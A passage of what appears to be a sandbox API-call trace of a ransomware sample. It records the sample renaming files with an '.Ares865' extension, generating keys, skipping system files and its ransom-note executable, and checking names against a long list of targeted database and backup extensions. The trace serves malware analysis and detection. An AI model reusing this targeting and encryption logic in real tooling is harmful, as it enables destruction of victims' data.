param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Libraries\\desktop.ini.Ares865") returned 45 [0056.244] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Libraries\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\libraries\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0056.245] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\libraries\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0056.245] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=88) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0056.246] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0056.246] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.246] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x12c [0056.260] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0056.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0056.262] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0056.262] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.263] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.263] CloseHandle (hObject=0x12c) returned 1 [0056.263] CloseHandle (hObject=0x15c) returned 1 [0056.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.265] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497f0ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497f0ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.265] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.265] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="aoldtz.exe") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="windows") returned -1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootmgr") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="temp") returned -1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="pagefile.sys") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ids.txt") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="perflogs") returned 1 [0056.265] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="MSBuild") returned 1 [0056.265] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0056.265] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0056.266] lstrcpyW (in: lpString1=0x2cce434, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0056.266] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0056.266] lstrlenW (lpString="Ares865") returned 7 [0056.266] lstrcmpiW (lpString1="rary-ms", lpString2="Ares865") returned 1 [0056.266] lstrlenW (lpString=".dll") returned 4 [0056.266] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".dll") returned 1 [0056.266] lstrlenW (lpString=".lnk") returned 4 [0056.266] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".lnk") returned 1 [0056.266] lstrlenW (lpString=".ini") returned 4 [0056.266] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".ini") returned 1 [0056.266] lstrlenW (lpString=".sys") returned 4 [0056.266] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".sys") returned 1 [0056.266] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0056.266] lstrlenW (lpString="bak") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0056.266] lstrlenW (lpString="ba_") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0056.266] lstrlenW (lpString="dbb") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0056.266] lstrlenW (lpString="vmdk") returned 4 [0056.266] lstrcmpiW (lpString1="y-ms", lpString2="vmdk") returned 1 [0056.266] lstrlenW (lpString="rar") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0056.266] lstrlenW (lpString="zip") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0056.266] lstrlenW (lpString="tgz") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0056.266] lstrlenW (lpString="vbox") returned 4 [0056.266] lstrcmpiW (lpString1="y-ms", lpString2="vbox") returned 1 [0056.266] lstrlenW (lpString="vdi") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0056.266] lstrlenW (lpString="vhd") returned 3 [0056.266] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0056.266] lstrlenW (lpString="vhdx") returned 4 [0056.266] lstrcmpiW (lpString1="y-ms", lpString2="vhdx") returned 1 [0056.266] lstrlenW (lpString="avhd") returned 4 [0056.267] lstrcmpiW (lpString1="y-ms", lpString2="avhd") returned 1 [0056.267] lstrlenW (lpString="db") returned 2 [0056.267] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0056.267] lstrlenW (lpString="db2") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0056.267] lstrlenW (lpString="db3") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0056.267] lstrlenW (lpString="dbf") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0056.267] lstrlenW (lpString="mdf") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0056.267] lstrlenW (lpString="mdb") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0056.267] lstrlenW (lpString="sql") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0056.267] lstrlenW (lpString="sqlite") returned 6 [0056.267] lstrcmpiW (lpString1="ary-ms", lpString2="sqlite") returned -1 [0056.267] lstrlenW (lpString="sqlite3") returned 7 [0056.267] lstrcmpiW (lpString1="rary-ms", lpString2="sqlite3") returned -1 [0056.267] lstrlenW (lpString="sqlitedb") returned 8 [0056.267] lstrcmpiW (lpString1="brary-ms", lpString2="sqlitedb") returned -1 [0056.267] lstrlenW (lpString="xml") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0056.267] lstrlenW (lpString="$er") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0056.267] lstrlenW (lpString="4dd") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0056.267] lstrlenW (lpString="4dl") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0056.267] lstrlenW (lpString="^^^") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0056.267] lstrlenW (lpString="abs") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0056.267] lstrlenW (lpString="abx") returned 3 [0056.267] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0056.267] lstrlenW (lpString="accdb") returned 5 [0056.267] lstrcmpiW (lpString1="ry-ms", lpString2="accdb") returned 1 [0056.268] lstrlenW (lpString="accdc") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accdc") returned 1 [0056.268] lstrlenW (lpString="accde") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accde") returned 1 [0056.268] lstrlenW (lpString="accdr") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accdr") returned 1 [0056.268] lstrlenW (lpString="accdt") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accdt") returned 1 [0056.268] lstrlenW (lpString="accdw") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accdw") returned 1 [0056.268] lstrlenW (lpString="accft") returned 5 [0056.268] lstrcmpiW (lpString1="ry-ms", lpString2="accft") returned 1 [0056.268] lstrlenW (lpString="adb") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0056.268] lstrlenW (lpString="adb") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0056.268] lstrlenW (lpString="ade") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0056.268] lstrlenW (lpString="adf") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0056.268] lstrlenW (lpString="adn") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0056.268] lstrlenW (lpString="adp") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0056.268] lstrlenW (lpString="alf") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0056.268] lstrlenW (lpString="ask") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0056.268] lstrlenW (lpString="btr") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0056.268] lstrlenW (lpString="cat") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0056.268] lstrlenW (lpString="cdb") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0056.268] lstrlenW (lpString="ckp") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0056.268] lstrlenW (lpString="cma") returned 3 [0056.268] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0056.268] lstrlenW (lpString="cpd") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0056.269] lstrlenW (lpString="dacpac") returned 6 [0056.269] lstrcmpiW (lpString1="ary-ms", lpString2="dacpac") returned -1 [0056.269] lstrlenW (lpString="dad") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0056.269] lstrlenW (lpString="dadiagrams") returned 10 [0056.269] lstrcmpiW (lpString1="library-ms", lpString2="dadiagrams") returned 1 [0056.269] lstrlenW (lpString="daschema") returned 8 [0056.269] lstrcmpiW (lpString1="brary-ms", lpString2="daschema") returned -1 [0056.269] lstrlenW (lpString="db-journal") returned 10 [0056.269] lstrcmpiW (lpString1="library-ms", lpString2="db-journal") returned 1 [0056.269] lstrlenW (lpString="db-shm") returned 6 [0056.269] lstrcmpiW (lpString1="ary-ms", lpString2="db-shm") returned -1 [0056.269] lstrlenW (lpString="db-wal") returned 6 [0056.269] lstrcmpiW (lpString1="ary-ms", lpString2="db-wal") returned -1 [0056.269] lstrlenW (lpString="dbc") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0056.269] lstrlenW (lpString="dbs") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0056.269] lstrlenW (lpString="dbt") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0056.269] lstrlenW (lpString="dbv") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0056.269] lstrlenW (lpString="dbx") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0056.269] lstrlenW (lpString="dcb") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0056.269] lstrlenW (lpString="dct") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0056.269] lstrlenW (lpString="dcx") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0056.269] lstrlenW (lpString="ddl") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0056.269] lstrlenW (lpString="dlis") returned 4 [0056.269] lstrcmpiW (lpString1="y-ms", lpString2="dlis") returned 1 [0056.269] lstrlenW (lpString="dp1") returned 3 [0056.269] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0056.269] lstrlenW (lpString="dqy") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0056.270] lstrlenW (lpString="dsk") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0056.270] lstrlenW (lpString="dsn") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0056.270] lstrlenW (lpString="dtsx") returned 4 [0056.270] lstrcmpiW (lpString1="y-ms", lpString2="dtsx") returned 1 [0056.270] lstrlenW (lpString="dxl") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0056.270] lstrlenW (lpString="eco") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0056.270] lstrlenW (lpString="ecx") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0056.270] lstrlenW (lpString="edb") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0056.270] lstrlenW (lpString="epim") returned 4 [0056.270] lstrcmpiW (lpString1="y-ms", lpString2="epim") returned 1 [0056.270] lstrlenW (lpString="fcd") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0056.270] lstrlenW (lpString="fdb") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0056.270] lstrlenW (lpString="fic") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0056.270] lstrlenW (lpString="flexolibrary") returned 12 [0056.270] lstrcmpiW (lpString1="V.library-ms", lpString2="flexolibrary") returned 1 [0056.270] lstrlenW (lpString="fm5") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0056.270] lstrlenW (lpString="fmp") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0056.270] lstrlenW (lpString="fmp12") returned 5 [0056.270] lstrcmpiW (lpString1="ry-ms", lpString2="fmp12") returned 1 [0056.270] lstrlenW (lpString="fmpsl") returned 5 [0056.270] lstrcmpiW (lpString1="ry-ms", lpString2="fmpsl") returned 1 [0056.270] lstrlenW (lpString="fol") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0056.270] lstrlenW (lpString="fp3") returned 3 [0056.270] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0056.270] lstrlenW (lpString="fp4") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0056.271] lstrlenW (lpString="fp5") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0056.271] lstrlenW (lpString="fp7") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0056.271] lstrlenW (lpString="fpt") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0056.271] lstrlenW (lpString="frm") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0056.271] lstrlenW (lpString="gdb") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0056.271] lstrlenW (lpString="gdb") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0056.271] lstrlenW (lpString="grdb") returned 4 [0056.271] lstrcmpiW (lpString1="y-ms", lpString2="grdb") returned 1 [0056.271] lstrlenW (lpString="gwi") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0056.271] lstrlenW (lpString="hdb") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0056.271] lstrlenW (lpString="his") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0056.271] lstrlenW (lpString="ib") returned 2 [0056.271] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0056.271] lstrlenW (lpString="idb") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0056.271] lstrlenW (lpString="ihx") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0056.271] lstrlenW (lpString="itdb") returned 4 [0056.271] lstrcmpiW (lpString1="y-ms", lpString2="itdb") returned 1 [0056.271] lstrlenW (lpString="itw") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0056.271] lstrlenW (lpString="jet") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0056.271] lstrlenW (lpString="jtx") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0056.271] lstrlenW (lpString="kdb") returned 3 [0056.271] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0056.271] lstrlenW (lpString="kexi") returned 4 [0056.272] lstrcmpiW (lpString1="y-ms", lpString2="kexi") returned 1 [0056.272] lstrlenW (lpString="kexic") returned 5 [0056.272] lstrcmpiW (lpString1="ry-ms", lpString2="kexic") returned 1 [0056.272] lstrlenW (lpString="kexis") returned 5 [0056.272] lstrcmpiW (lpString1="ry-ms", lpString2="kexis") returned 1 [0056.272] lstrlenW (lpString="lgc") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0056.272] lstrlenW (lpString="lwx") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0056.272] lstrlenW (lpString="maf") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0056.272] lstrlenW (lpString="maq") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0056.272] lstrlenW (lpString="mar") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0056.272] lstrlenW (lpString="marshal") returned 7 [0056.272] lstrcmpiW (lpString1="rary-ms", lpString2="marshal") returned 1 [0056.272] lstrlenW (lpString="mas") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0056.272] lstrlenW (lpString="mav") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0056.272] lstrlenW (lpString="maw") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0056.272] lstrlenW (lpString="mdbhtml") returned 7 [0056.272] lstrcmpiW (lpString1="rary-ms", lpString2="mdbhtml") returned 1 [0056.272] lstrlenW (lpString="mdn") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0056.272] lstrlenW (lpString="mdt") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0056.272] lstrlenW (lpString="mfd") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0056.272] lstrlenW (lpString="mpd") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0056.272] lstrlenW (lpString="mrg") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0056.272] lstrlenW (lpString="mud") returned 3 [0056.272] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0056.272] lstrlenW (lpString="mwb") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0056.273] lstrlenW (lpString="myd") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0056.273] lstrlenW (lpString="ndf") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0056.273] lstrlenW (lpString="nnt") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0056.273] lstrlenW (lpString="nrmlib") returned 6 [0056.273] lstrcmpiW (lpString1="ary-ms", lpString2="nrmlib") returned -1 [0056.273] lstrlenW (lpString="ns2") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0056.273] lstrlenW (lpString="ns3") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0056.273] lstrlenW (lpString="ns4") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0056.273] lstrlenW (lpString="nsf") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0056.273] lstrlenW (lpString="nv") returned 2 [0056.273] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0056.273] lstrlenW (lpString="nv2") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0056.273] lstrlenW (lpString="nwdb") returned 4 [0056.273] lstrcmpiW (lpString1="y-ms", lpString2="nwdb") returned 1 [0056.273] lstrlenW (lpString="nyf") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0056.273] lstrlenW (lpString="odb") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0056.273] lstrlenW (lpString="odb") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0056.273] lstrlenW (lpString="oqy") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0056.273] lstrlenW (lpString="ora") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0056.273] lstrlenW (lpString="orx") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0056.273] lstrlenW (lpString="owc") returned 3 [0056.273] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0056.273] lstrlenW (lpString="p96") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0056.274] lstrlenW (lpString="p97") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0056.274] lstrlenW (lpString="pan") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0056.274] lstrlenW (lpString="pdb") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0056.274] lstrlenW (lpString="pdm") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0056.274] lstrlenW (lpString="pnz") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0056.274] lstrlenW (lpString="qry") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0056.274] lstrlenW (lpString="qvd") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0056.274] lstrlenW (lpString="rbf") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0056.274] lstrlenW (lpString="rctd") returned 4 [0056.274] lstrcmpiW (lpString1="y-ms", lpString2="rctd") returned 1 [0056.274] lstrlenW (lpString="rod") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0056.274] lstrlenW (lpString="rodx") returned 4 [0056.274] lstrcmpiW (lpString1="y-ms", lpString2="rodx") returned 1 [0056.274] lstrlenW (lpString="rpd") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0056.274] lstrlenW (lpString="rsd") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0056.274] lstrlenW (lpString="sas7bdat") returned 8 [0056.274] lstrcmpiW (lpString1="brary-ms", lpString2="sas7bdat") returned -1 [0056.274] lstrlenW (lpString="sbf") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0056.274] lstrlenW (lpString="scx") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0056.274] lstrlenW (lpString="sdb") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0056.274] lstrlenW (lpString="sdc") returned 3 [0056.274] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0056.274] lstrlenW (lpString="sdf") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0056.275] lstrlenW (lpString="sis") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0056.275] lstrlenW (lpString="spq") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0056.275] lstrlenW (lpString="te") returned 2 [0056.275] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0056.275] lstrlenW (lpString="teacher") returned 7 [0056.275] lstrcmpiW (lpString1="rary-ms", lpString2="teacher") returned -1 [0056.275] lstrlenW (lpString="tmd") returned 3 [0056.275] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0056.275] lstrlenW (lpString="tps") returned 3 [0056.275] 